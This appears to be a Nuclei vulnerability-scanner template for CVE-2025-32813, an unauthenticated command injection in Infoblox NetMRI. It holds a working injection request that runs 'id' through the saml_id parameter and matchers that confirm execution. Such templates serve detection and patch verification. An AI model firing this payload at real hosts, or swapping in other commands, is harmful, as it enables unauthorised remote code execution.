id: CVE-2025-32813 info: name: Infoblox NetMRI < 7.6.1 - Unauthenticated Command Injection in get_saml_request author: iamnoooob,pdresearch severity: high description: | An issue was discovered in Infoblox NETMRI before 7.6.1. Remote Unauthenticated Command Injection can occur. impact: | Unauthenticated attackers can execute arbitrary operating system commands with elevated privileges through the saml_id parameter in the get_saml_request endpoint. remediation: | Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes user input in SAML request handling. reference: - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/ - https://github.com/RhinoSecurityLabs/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2025-32813 cwe-id: CWE-77 epss-score: 0.11178 epss-percentile: 0.93631 cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: infoblox product: netmri fofa-query: "Infoblox NetMRI" tags: cve,cve2025,infoblox,netmri,rce,vkev,vuln http: - raw: - | GET /webui/application/get_saml_request?saml_id=1%26$(id|%20base64); HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: idcmd part: body group: 1 regex: - "sh: (.*?): command" internal: true matchers: - type: dsl dsl: - 'contains_all(body, "sh", ": command not found","message")' - 'contains(content_type,"application/json")' - 'contains_all(base64_decode(idcmd),"uid=","gid=")' - 'status_code==500' condition: and # digest: 4a0a00473045022100efa716d5f332e5f98b1a7d08dd4ad74f48fdac679b9beac32cd9f44562935306022047dc85e429ad8764f09d6f7c0b32e32711469345bd5bc5a38d29aeff3ad52203:922c64590222798bb761d5b6d8e72950